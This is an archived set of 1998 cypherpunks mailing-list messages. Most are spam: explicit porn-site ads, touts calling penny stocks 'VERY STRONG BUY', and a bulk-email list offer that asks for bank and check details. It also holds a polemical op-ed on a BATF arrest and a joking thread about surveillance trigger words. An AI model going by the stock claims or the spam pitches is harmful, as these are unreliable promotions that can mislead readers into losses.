Contact us at info@connectfree.net or Telephone 0702 115 2525


No Catches, No Gimmicks, Just Connect FREE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Tue, 13 Oct 1998 16:05:53 -0700 (PDT)
To: edsmith@IntNet.net
Subject: Between the Lines
Message-ID: <3.0.2.32.19981013181653.007e7a80@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Between the Lines

Joseph Farah

Disarm the BATF 
                   

                   Another day, another debacle for the Bureau of
                   Alcohol, Tobacco and Firearms. 

                   This time, the scene is not Waco, Texas, or Ruby Ridge,
                   Idaho, but Taft, California -- another hotbed of
                   "anti-government activity." 

                   According to the federal government's own account, the
                   BATF began an investigation into illegal firearms sales
                   by people espousing anti-government rhetoric three or
                   four years ago with an undercover agent allegedly
                   making an illegal purchase of a .22-caliber pistol. 

                   It ended last week with one of the three targets of the
                   federal government probe dead in a highly unusual --
                   and, yes, improbable -- incident. 

                   The official story goes something like this: Two BATF
                   agents, a Kern County sheriff's deputy and Sgt. Ed
                   Whiting of the Taft Police Department attempted to
                   take into custody on illegal firearms trafficking charges,
                   Darryl Howell, a 45-year-old grandfather and owner of
                   a surplus store that sold, among other things, guns and
                   ammunition. 

                   A struggle between the BATF agents and Howell
                   ensued. The cops say he broke away from them, lunged
                   for a .45-caliber handgun, put it into his mouth and fired
                   a single shot. Whiting, the story goes, had become
                   temporarily distracted during the scuffle. When he
                   heard the single shot, he instinctively aimed his gun at
                   Howell and fired three more shots into his already,
                   presumably, lifeless body. 

                   Now, if you believe that, I have an intercontinental
                   ballistic missile I'd like to sell you. 

                   I'm not a cop, and I've never played one on TV. But I
                   have reported on enough crime stories in my day to
                   know when one stinks to high heaven. And this one
                   smells like a cattle ranch on a windless, summer day in
                   California's Central Valley. 

                   Let me see if I have this straight. Four cops, one
                   "suspect." This wanted outlaw -- so dangerous he's
                   been under scrutiny of federal law enforcement for
                   nearly four years -- is confronted not in his home, not on
                   his lunch break, not on his way to work or after he locks
                   up, but during the workday in a store loaded with
                   firearms. Even though he's not accused of being on
                   PCP or any other drugs, he cannot be physically
                   subdued by four officers. They are unable to persuade
                   him to come along peacefully or handcuff him
                   involuntarily. Instead, he is permitted by these highly
                   trained law enforcement professionals to grab one of his
                   guns. But they don't shoot him right away. Oh no. They
                   allow him to pick up the handgun, bring it all the way up
                   to his mouth and pull the trigger. Only then, we are told,
                   does one of the officers, who wasn't paying attention,
                   pump the desperado full of lead. 

                   Do these BATF clowns ever learn? Either these guys
                   are Washington's answer to the Keystone Kops, or we
                   have on the loose a cold, calculating, professional,
                   Gestapo-like killing machine designed to root out
                   dissidents exercising their Second Amendment rights
                   and blow them away without the messiness of trials and
                   due process. 

                   How many times does America need to see such
                   tragedies before it wakes up and disarms these
                   dangerous, out-of-control, gun-slinging hitmen? The
                   inmates are running the asylum, folks. Beam me up. 

                   There is no allegation made by any of these cowboys
                   that Howell or any others charged in a series of raids in
                   the town of Taft last week had provided weapons to
                   criminals or represented a threat to law-abiding citizens
                   anywhere. In fact, I personally would have felt a lot
                   safer in Taft last week, before Mr. Howell was
                   "suicided" than I would today. I think most Americans
                   would. 

                   Let's suspend our own cognitive skills and good
                   judgment for a moment and pretend the cops' story is
                   100 percent accurate. Was the four-year investigation
                   worth it? Was it a prudent investment of taxpayer
                   dollars? Why aren't these law-enforcement heroes out
                   investigating real crimes of violence against innocent
                   victims, instead of conducting secretive sting operations
                   designed to entrap people into violating inherently
                   unconstitutional laws? 

                   But, you know what? Such talk can get you in trouble
                   these days. One of the BATF agents responsible for
                   this tragedy said one of Howell's friends had (gasp!)
                   complained about a ban on "assault weapons" and the
                   actions of President Clinton, Attorney General Janet
                   Reno and U.S. Sen. Dianne Feinstein. 

                   At the risk of inviting a similar assault on my home or
                   business, let me pick up that cry: These are, indeed,
                   some of the people who represent a real threat to our
                   lives and liberty in America t




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED OCT 14 <stuffed@stuffed.net>
Date: Wed, 14 Oct 1998 02:28:26 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981014071001.24820.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ AMY'S XXX HARDDRIVE
+ AMY'S XXX HARDDRIVE
+ KISS ME KATE
+ WET ROOM
+ BOB'S NAKED GIRLS
+ CAISEY'S PALACE
+ QUALITY PORN
+ ONLY FREE SEX
+ FLESH PIT
+ NUDE GODDESSES
+ BONUS PIC 1 -> http://www.stuffed.net/home/29194.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/19064.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/11810.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/10153.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/10850.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lar@compwebtech.com
Date: Wed, 14 Oct 1998 18:54:12 -0700 (PDT)
To: <gnu@toad.com>
Subject: Advertisment for $ 99 WEB HOSTING
Message-ID: <199810150154.SAA25202@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Check it out! 25 megs for only $99 per year with no set up fees. 
Free registration or change of domain at: www.compwebtech.com

If you would like to be removed from our mailing list, please 
e-mail us to have yourself removed for the list.  

Thank You,

Larry@compwebtech.com
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stockadvisory79658ddlw@gte.net
Date: Thu, 15 Oct 1998 23:00:36 -0700 (PDT)
To: internet@aol.com
Subject: RE:  INTERNET STOCKWATCH!   I S M R
Message-ID: <196532478451.GAA74558@relay18.gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Company:  Internet Stock Market Resources
Symbol:   I S M R
Price:    2  1/4  ($2.25/share)

" I S M R is evolving into one of the internet's  main
financial web portals not unlike E*Trade in its 
future potential."

As a featured stock in both Success and Opportunist 
magazines and as a content partner with Time Warner's
Web TV   I S M R is rated a "VERY STRONG BUY".

For more information on I S M R go to:
http://quicken.excite.com/investments/quotes



  
 
 
 plxII7.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: picc98@wowmail.com
Date: Wed, 14 Oct 1998 16:31:38 -0700 (PDT)
Subject: POWER & MAGIC OF E-MAIL!!!
Message-ID: <199810142331.QAA24092@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/html



Mail Your Message to MILLIONS!  through 
the POWER & MAGIC OF E-MAIL!!!
ARE YOU Tired of NOT making money on the Internet?
Did you REALLY believe that ALL you had to do was put up a web page with some attractive graphics, some Java, some frames, run a few classified ads, post to a few newsgroups, swap a few banner ads, and it allstarts to roll in? Well, that's NOT the way it is!
It's all about traffic, and getting your INTERESTING MESSAGE in front of
INTERESTED PEOPLE, lots of 'em!!!!!! If you want to make money on the Internet, you should do all the rest, AND MAKE IT A POINT TO DO THIS ONE!!!
You've got to be savvy, aggressive, and get your message in front of LOTS OF PEOPLE!
And IF YOU HAVE TO DO THAT, WHY NOT USE ONE OF THE MOST COST EFFECTIVE and instant MEANS OF TELLING YOUR STORY TO HUNDREDS OF THOUSANDS, EVEN MILLIONS OF PEOPLE? IT SURE MAKES SENSE, DOESN'T IT?
 		Use Bulk email - IT WORKS, !!! 
............a well-written, strategically targeted E-MAIL MESSAGE, fulfilling an identified need, can and will make you money on the Internet, even on a limited budget,  as long as you GET IT IN FRONT A NUMBER OF PEOPLE. 
				WHY IS IT SO EFFECTIVE?
	a) Because it is the MOST COST EFFECTIVE MEDIUM EVER                          CREATED!
	On the average, an individual direct (snail) mail promotion would cost around 	$500.00 per thousand , whereas bulk e-mail costs pennies per thousand. No                                    known 	form of media advertising can compete with the low cost of bulk 
           e-mail.
            b) Because it is INSTANT, no waiting for the snail mail to eventually get to its 	destination. You get a reading almost immediately on the impact of your              message.
	c) Because you can hit your target right right in the BULLS EYE!
	d) Because PEOPLE READ E-MAIL! Your message will sit in your                recipient' mail box until is it read.  It's SEEN, not BURIED!
Your business deserves a piece of the BIGGEST COMMERCIAL BONANZA since the Gold Rush Days. It's yours for the taking online, on the Internet. Join the many home-based businesses currently making A FORTUNE in direct online sales. In order to capture your share of this Windfall,  those people anxious to do business with you have to know about you and about the great product you're selling.
How do you find the people interested in your product? or better put....... 
HOW DO PEOPLE INTERESTED IN YOUR PRODUCT FIND YOU? 
 YOU HAVE TO Let 'em know you're there.  YOU MUST Tell them about your product the BEST WAY... by E-MAIL!
How do you know WHO THEY ARE, and  WHERE THEY ARE?
		WE'VE GOT THE ADDRESSES FOR YOU!!
We have MILLIONS of TARGETED NAMES, ready for you to contact by E-MAIL. These are people who have demonstrated a strong interest in each of the catetories below,  NOT RANDOM SPAM with no INTEREST BY THE RECIPIENTS. This is very important!
The following are only some of the MANY CATEGORIES. If you don't see  your category, or need an exact count, please e-mail your request. 
ART			ANIMAL TENDING		ASTROLOGY		ASTRONOMY
ADVERTISING		AUTOMOTIVE		AWARDS	             ACCOUNTING
AUCTIONS		AUDIO			AUTO			AIRCRAFT
ANTIQUES		AVIATION		ARTS		                BUILDING RELATED
AGRICULTURE		BOATING		BUSINESS EQUIPMENT
BOATS			BEAUTY PRODUCTS				BERRIES
BOOKS			BUSINESS		BUSINESS SERVICES	
BEER & WINE		BEAUTY PRODUCTS	CHILD CARE		                COMPUTERS	
CARDS			CAMERAS		CAMPING		CATALOG
CONSUMER ELECTRONICS
CIGARS		                CLOTHING		COMICS	            CHARITABLE ORGS	CRAFTS		CONSTRUCTION			
COLLECTIBLES		CHRISTMAS		COMMUNICATIONS	DENTAL
COMEDY		CONTESTS		DRINK			DOCTORS
EMPLOYMENT		ENTERTAINMENT		ENVIRONMENT		EATERIES
ETHNIC			EDUCATION		FASHION/CLOTHING/ACCESSORIES
FAMILY			FINANCE		FISHING			FLOWERS
FIRE SAFETY		FOOD			FOOTWEAR		
GARDENING & PLANTS	GIFTS	
GREETING CARDS		            GAMBLING		GAMES			GUNS		
GAMES			HEALTH & MEDICINE 	HOBBIES		 HOLIDAYS
HUMOR			HUNTING		HOME			
INTERNET RELATED	INVESTMENTS		MEDIA	
LISTS			MAGAZINES		MEDICAL		MEDICINE
MISCELLANEOUS	MODELS		MOVIES		
MONEY			MLM			MUSIC			NEWS	
NEWSLINKS		OFFICE			PENS		                PERSONAL DEVELOPMENT
PERFORMING		PONIES			PHOTOGRAPHY		POLITICAL 
PROFESSIONALS		PLANTS
PSYCHOLOGY		PUBLISHING		REAL ESTATE		RELIGION
SCIENCE		SECURITY		SHOPPING		SOFTWARE
STATIONERY		STOCKS			STOCK TRADERS		SCIENCE	
SPIRITUALITY		SELF HELP
SPORTS			SPORTS EQUIPMENT           SURPLUS		SURVEYS	
SEASONAL ITEMS                TELEMARKETING		TECHNOLOGY
TELEPHONE		TELEPONES		TRADE	 	TRANSPORTATION
TRAVEL			TROPHIES		TV			VIDEO	
WEDDINGS		WILDERNESS CAMPING	WRITERS
WEATHER		WEB DESIGN
				and many, many more!!!!!!
					
Our e-mail lists are maintained on state-of-the-art computers and are updated daily to assure you the very latest TARGETED names for your mailings. 
Bulk Email Works!!
Put your sales message in front of responsive buyers WHO HAVE DEMONSTRATED AN INTEREST IN YOUR TYPE OF PRODUCT. Our lists are compiled from active and willing on-line purchasers and entrepreneurs. 
THESE ARE SERIOUS PROSPECTS LOOKING FOR SERIOUS OFFERS!
These PROSPECTS want to read and hear more about your products/services.
Our list is updated daily with fresh and new email addresses.
If you receive 1/10 of 1% response for mailing 1,000,000 email addresses 
you would receive 1000 replies !!!!
How much business would that generate for you?
Save TIME and MONEY!  Focus entirely on your sales. Let us do your mailing for you at these INCREDIBLY LOW RATES:
*****WE SPECIALIZE ONLY  IN TARGETEDMAILINGS********* 			CALL FOR DETAILS
_____YES- mail my message to 5,000 TARGETED prospects for $149.95
_____YES- mail my message to 10,000 TARGETED prospects for $269.95
_____YES- mail my message to 20,000 TARGETED prospects for $389.95
_____YES- mail my message to 30,000 TARGETED prospects for $499.95
_____YES- mail my message to 40,000 TARGETED prospects for $599.95
_____YES- mail my message to 50,000 TARGETED prospects for $689.95
 
_____YES- mail my message to 100,000 TARGETED prospects for $899.95
Please supply us with 'keywords' when ordering a targeted group.(Ex: Health and Fitness, Network marketeing, MLM, Home based business, Computing, Weight Loss, Sports etc..., )
		We take CHECKS BY FAX 
get our most up to date list mailed for YOU by ordering NOW!!
Call  407-956-1151 or Fax your order to 407-952-7984.
Office hours are Mon-Fri 10 am - 6 pm Eastern Standard Time. 
Make checks or money order payable to: PICC
Or mail check or money order to: 
Progressive Internet Communications, Co.
P.O. Box 100512
Palm Bay, Florida 32910-0512
ORDER YOUR MAILING PROGRAM TODAY!!
ORDER FORM
========================================================
Name___________________________________________
Address__________________________________________
City______________________State_________Zip_______
E-Mail Address____________________________________
Phone___________________________________________
Business phone____________________________________
Check Ordering info:
Name( exactly as it appears on check)
______________________________________________________
Check number_______________Dollar Amount_________________
**Fraction Code(numbers that appear below check number on top
right) (do not leave blank-ex:123-45/6789)______________________
Numbers at Bottom of check(read left to right please indicate
blank spaces with a space)_________________________________
Bank Name_____________________________________________
Bank Address____________________________________________
Bank City/Bank Zip Code___________________________________
Bank phone # (if applicable)_________________________________
 
                               
___________________________________________________
                     TAPE CHECK HERE
___________________________________________________
** PLEASE BE SURE TO INCLUDE A SUBJECT LINE WITH YOUR AD** 
**IF ORDERING FROM OUTSIDE THE US PLEASE SEND US POSTAL MONEY ORDER**All sales final.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steelin@hotmail.com
Date: Wed, 14 Oct 1998 04:29:06 -0700 (PDT)
To: steelin@hotmail.com
Subject: The guitar video everybodies talking about
Message-ID: <199810141123.TAA20021@public.qd.sd.cn>
MIME-Version: 1.0
Content-Type: text/plain


___________________________________________________________
Howdy!
     Just wanted to drop you a note to let you about my
Video "Steelin' from the Steel",. If your anything like me, 
your always looking for something new that will help you spice up
your playing and phrasing without too much effort, make you 
a better player...This is the video for you!!!! This video easily
fills up your" bag of licks" with phrases that will make you a much
more creative musician, than by learning a bunch of penatonic
blues scales which have been taught into the ground.
   This video is by far the most interesting guitar instruction available.
I sat down in the studio with one of the greatest L.A. tele players
around. I'm on pedal steel and I proceeded to play all the interesting 
sounds on the steel guitar and Mike on tele plays them EXACT
and explains how to play them. The sounds coming off his 
guitar and the new ideas that can come from these chord
bends will open up some serious musical doors for you.
We go through bends, fills, intros and licks galore...
    For the beginer to advanced player, very easy concepts to
pick up and use in any style of music. It's nice to know
you can easily become a much more creative musician
with just a little effort and "Steelin' from the Steel."
    If your interested just click the link below and it will take you to 
my page offering the Video...I appreciate your time and till we
meet out on the road....Gotta keep pickin'....Kevin
http://www.clublickit.com/video3.htm 
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 11471..201@compusub.com
Date: Wed, 14 Oct 1998 21:06:17 -0700 (PDT)
Subject: Thank you for your inquiry
Message-ID: <199810150406.VAA26023@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This is your free issue of the Global Media and Corporate Relations
newsletter. In order to continue to receive the GMCR News you must reserve
your place in our news server by one of the methods below. If this
newsletter has reached your mailbox in error, do nothing and you will
receive no further contact.

Visit http://www.corporaterelations.com and sign in to reserve your place
in our news server.
			or
Email to gmcr-list@corporaterelations.com ; include the words 'join
gmcr-news' in the body of the message.
 
GLOBAL MEDIA AND CORPORATE RELATIONS NEWS

GMCR is dedicated to bringing you the most timely critical investment
information about new issues, IPO's, small cap stocks and special
opportunities that simply cannot be found elsewhere. All of the investment
opportunities presented here are thoroughly screened by our experienced
team of investment professionals. Each of our client companies has
undergone a stringent due diligence process to insure that the investment
potential is a bona fide GMCR opportunity.

One Asian Tiger Roars as the Others Roll Over and Play Dead

For the first half of 1998, U.S. electronics exports to Asia dropped 12% in
the face of various economic crises and currency devaluations in the
Pacific Rim that saw country economies falling like dominos. The culprits:
Indonesian imports down 64%, Korean down 37%, Thai down 26%, and Japanese
imports down 14%. So how did the U.S. semiconductor manufacturers fair
overall? Total semiconductor sales worldwide were only down .38% because
Eastern Europe, Mexico, Canada and China increased their purchases at the
expense of their Asian counterparts. China, one of the Asian Tigers,
escaped the crisis conditions unscathed, actually increasing their imports
of U.S. semiconductor products by 50% during the first half of this year
according to industry sources.

China's tight control over its currency allowed it to escape the problems
that slashed fifty cents on the dollar out of the other Asian Tiger
currencies. While the other countries worried about currency devaluations
and layoffs in industry, China quietly ramped up production in their three
"golden" markets: telecommunication, consumer electronics and home
appliances grabbing market share along the way. 

FEATURED COMPANY

Our feature company this month is Micronics International, Inc (OTC:BB
MCIK). Micronics International (MCIK) has been undervalued with the recent
Asian crisis driving stocks lower. Timing is right for Micronics
International (MCIK) to rocket upward propelled by a burgeoning Chinese
semiconductor market.

Their current mission is to take advantage of the large Chinese government
incentives to moev electronic manufacturing from the coast to the interior
of the country. Micronics is locating their new offices in the heart of
these new centers of industry. The company will be perfectly positioned for
a buy-out or merger with a larger U.S. semiconductor distributor looking
for an established marketing channel into China, soon to be the worlds'
biggest market for semiconductor products.
 
Micronics (MCIK) is the Second Largest U.S. Distributor of semiconductors
into the Chinese telecommunications, consumer electronics and home
appliance manufacturing sectors. The company has established both close
relationships with the government and permanent offices within their
borders. The Chinese must import 94% of integrated circuit needs and their
buying has INCREASED 50% during the Asian Crisis!

Micronics (MCIK) is rocketing upward because:

* The 1998 Chinese import market for chips? Over six billion units.
* First half of 1998 showed a 50% increase in U.S. semiconductor imports
into China, 10% higher than was predicted by industry insiders.
* Industry forecasts for semiconductor sales: $120 billion 2005, $550
billion 2010, World's largest market by 2015.
* A $50 billion plus semiconductor market in China is projected to grow at
a 40% rate the next seven years! 
* The semiconductor market has grown steadily, 25% per year, for the last
ten years in lockstep with increased U.S. imports into China! 

* Over 60 years of combined semiconductor marketing experience among the
Micronics officers.
* Micronics has excellent government and local factory contacts in China
through a professional sales force.
* The low cost provider to the market through strategic purchases of key
stocks.
* Long term relationships with U.S. proprietary chip manufacturers and
smaller U.S. distributors focusing on telecommunications, computers and
energy conservation, Micronics' key markets.
* The U.S. semiconductor companies have a solid 10% of the China market
* Very few American distributors are willing and able to crack the China
distribution market. The only competitor of note is Arrow Electronics who
does approximately $120 million in sales a year in China.
* Many U.S. companies want in China, Micronics is positioned as a possible
acquisition or marketing channel.
 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU OCT 15 <stuffed@stuffed.net>
Date: Thu, 15 Oct 1998 03:29:42 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981015071000.22006.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ PUSSY LICKIN' LESBIANS
+ ODD INSERTION
+ TAAASTY TAMERS
+ FREE XXX SMUT
+ TAAASTY TAMERS
+ SEXY SITES
+ ANTIQUE PORNOGRAPHY
+ VIRGIN PUSSIES
+ EUROPEAN WOMEN
+ LAND O LEZ
+ BONUS PIC 1 -> http://www.stuffed.net/home/23807.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/30298.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/25946.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/24676.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/7112.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Thu, 15 Oct 1998 06:48:13 -0700 (PDT)
To: leif@imho.net
Subject: Re: Use encryption to foil spooks' data harvesting, says US statedept
Message-ID: <8025669E.004B0866.01@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


and how about some innocuous words/phases that might cause apoplexy

i talk to the pillow (PLO) every night

i was there doing ... with ..., i wish.  <insert name> was dead on his feet
....

it goes on.

I like the encryption bit.  Season your conversations with encryption and
they won't find the wood for the trees.  Who actually needs encryption in
this case.  Everyone can just put the word encryption into every
conversation every other sentence.
Miles of recording tape, (bytes of memory, whatever) just stuffed with
inane conversation with a few select phrases.






leif@imho.net on 15/10/98 14:20:26

To:   Richard Bragg/UK/SSA_EUROPE
cc:
Subject:  Re: Use encryption to foil spooks' data harvesting, says US
      statedept




GOOD that did not bounce... Over the last few days my imho mail
bounced..  mostly from some DNS, and mail server problems since I made
some changes... (at my office who is at this point my mail hub... hehe
it is fun to be the SA)

OK words or phrases that can be used.
Death
Kill Destroy
ENCRYPTION
President
Vice President
First Lady
Bomb
dead
maim
hate if used correctly
missile ( I am sure it is in the list if used correctly )
Nerve gas
lets see should I go on or do you have the idea..
Here is a hint...  I was talking with a friend one day a computer geek
himself and we mentioned the word encryption and started talking about
said stuff...  Well after that word was aid we here a clicking type
noise in the background??? HUMMMMMMMMM  we change the subject and after
some time talking it goes away we say encryption and it came back....

HUMMMMMMMM

               Go figure.
               - lhe









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI OCT 16 <stuffed@stuffed.net>
Date: Fri, 16 Oct 1998 01:51:32 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981016071000.4883.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ XCLIMAX
+ CAM'S PERFECT BREAST BONANZA
+ MAIDENJUICE
+ SEXLAND EXTREME HARDCORE
+ CYBERJOBE'S BUSTY BABES
+ CUCHI
+ ASS HUMPER
+ ASIAN EXOTICA
+ LESBIAN PALACE
+ GRANNY PANTIES
+ BONUS PIC 1 -> http://www.stuffed.net/home/18421.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/8764.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/7314.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/6430.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/3373.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lewisantonio@usa.net
Date: Fri, 16 Oct 1998 07:30:30 -0700 (PDT)
Subject: ATTENTION HOMEOWNER***FREE SERVICE***FREE SOFTWARE
Message-ID: <199810161430.HAA29794@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


ATTENTION HOMEOWNER***FREE SERVICE***FREE SOFTWARE 
Save Thousands of $$$$$ off your Mortgage without Refinancing!  
Cut years off your Mortgage without Increasing your Payments!  
Build Equity in your Home 300% Faster! 
Email:  mailto:lewisantonio@usa.net
For Instant Info. 
Visit:  http://www.freeyellow.com/members/scrap64/page5.html 	







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aladdin Systems <aladdinspecials@LISTSERVER.DIGITALRIVER.COM>
Date: Fri, 16 Oct 1998 18:47:03 -0700 (PDT)
To: ALADDIN-WIN@LISTSERVER.DIGITALRIVER.COM
Subject: Ooops, didn't save?  FlashBack!
Message-ID: <018001bdf966$08fd99a0$75d2d1d0@c-kosel.digitalriver.com>
MIME-Version: 1.0
Content-Type: text/plain


*********************************************************************

You are currently a member of the Aladdin Information mailing
list. Your email address was submitted at the Aladdin web site
indicating that you wished to receive information pertaining to
Aladdin products. If you would like to be removed from this list
please refer to the instructions found at the bottom of this email.

*********************************************************************

Dear Valued Aladdin Customer,

It's not often that a whole new kind of software gets discovered.
These days, it seems like products on the market span numerous
technology areas with many different functions without really being
helpful at all. The number of really new and exciting software that
gets released has just about disappeared.

Announcing: Aladdin FlashBack, an easy and fast way to protect your
files! Faster than backups, safer and easier than file recovery.
Document and data protection has never been as easy or automatic.
http://www.digitalriver.com/Aladdin/FBKpc

Aladdin introduces the POWER of Unlimited Undos:

Use Aladdin FlashBack and discover the power of virtually unlimited
Undos. Sound impossible? FlashBack tracks the changes made to a file
every time you hit Save. It's easy to recover from accidental changes
even after you've quit your application, turned your computer off and
gone home. If you FlashBacked your document, at any time in the
future, you can retrieve that exact version as fast as you can
double-click. (FlashBack keeps up to 999 versions of each file!)

This week only! You can purchase Aladdin's electronic version of
FlashBack for the amazingly low price of only $9.95 (an incredible
SAVINGS OF OVER 80%!!). Don't wait! Easy and safe online ordering and
electronic delivery is available through Aladdin's online store,
Digital River at:  http://www.digitalriver.com/Aladdin/FBKpc

FlashBack a file and you're protected against accidental deletion,
file corruption, even from hitting the Save key and overwriting your
file. Aladdin FlashBack is a whole new way to safeguard your important
files.

"...as a safety net for your data, it's unique and indispensable."
-PC Magazine Online

That's right, FlashBack recovers not only lost or damaged files, but
also previous versions of files that you changed, even if you made
the changes months ago.

"FlashBack makes saving and tracking files easy, and makes crashes
less painful by reducing the chances of your data getting permanently
erased."
-CNET

Works on any file:

FlashBack tracks only the documents you want, and works with any
application you use. From word processing to graphics programs, web
design, databases and spreadsheets: FlashBack is compatible with any
application that Saves documents!

Instant file recovery:

Restore any file you've protected with FlashBack just by pointing
and clicking. With FlashBack you're just seconds away from recovery.

Save Disk Space:

With FlashBack, you can keep multiple versions of your important
files without gobbling up megabytes of disk space. FlashBack makes
only one complete copy of your current file. Previous versions are
tracked through "diff" files. Diff files are small files that contain
just the changes, or differences, between one version and the next.
The result? You can save five, ten, twenty or more versions of a file
and still take up less room than you would by hitting Save As just a
couple of times!

Time & Date Stamping:

FlashBack time and date stamps every version so you can easily
recover the exact version you're looking for.

Quick & Easy:

To FlashBack a file just drop the file into the FlashBack
application. To restore a file, just drag it out of FlashBack or
double-click, that's it! FlashBack will instantly recover your file
exactly the way it was when you saved it. FlashBack will protect both
local and networked documents, and can update files either each time
you save or at specified times: by any combination of minutes, hours
or days.

What would you pay to recover just one document that was lost,
damaged, or accidentally overwritten? I know that I have lost days,
not hours, recreating work that disappeared when I hit the Save key
without thinking.

Remember, for ONE WEEK ONLY you can purchase Aladdin's electronic
version of FlashBack for the amazingly low price of only $9.95
(regularly $49.95).

Don't wait! This is a special introductory price that will expire.
Its list price is $99.95, and the price for FlashBack, even for
Aladdin customers, will be going up soon.

Visit our online store today to get your copy of the best new
software of the year. You are, as always, covered by Aladdin's "no
questions asked" 30 day money-back guarantee.
http://www.digitalriver.com/Aladdin/FBKpc

Order Aladdin FlashBack for the insanely low introductory price
of $9.95, and give your data the kind of protection you've always
wished it could have: easy, automatic and hassle-free.

=====================================================================
If you would prefer not to receive our news and special offers
in the future do NOT reply to this message, instead:
   1. mailto:listserv@listserver.digitalriver.com
   2. Put "UNSUBSCRIBE ALADDIN-WIN" (without quotes) in the
      FIRST LINE of the message BODY
=====================================================================

Sincerely,

Jonathan Kahn
Founder & President
Aladdin Systems




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 95959742@mailcity.com
Date: Sat, 17 Oct 1998 00:50:06 -0700 (PDT)
To: Friend@public.com
Subject: Accept Credit Cards Online!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


INCREASE SALES UP TO 100%
ACCEPT CREDIT CARDS OVER THE INTERNET *** NO SETUP FEES

Good Credit / Bad Credit/ No Credit **** NO PROBLEM****!!!
It Just Doesn't Matter - Everyone Gets Approved 
ONLY $49.95 TO GET STARTED!!!
No Upfront Fees For Application-Processing
While Others Charge You From $195 TO $250 To Get Set Up
WE CHARGE ZERO FOR SETUP FEES!!  
Limited Offer So Take Advantage Of It!!
We Specialize In Servicing The Following:
*Multilevel Marketing
*Mail Order/Phone Sales
*At Home Business
*INTERNET BASED BUSINESS
*New Business*Small Business
Whatever!!! We Do It All!!! Everyone Is Welcome!

Call us toll free today 1-800-600-0343 ext. 2310

What Can We Do For Your Company????

>>>>>INTERNET SERVICE<<<<<

It's finally here!!! 
A fast and reliable way to process credit cards through your web site.
The Internet's reach is global - it knows no time zones or physical
boundaries. With our user friendly, easy to use program, you will convert
your web site from an electronic brochure to a virtual storefront without
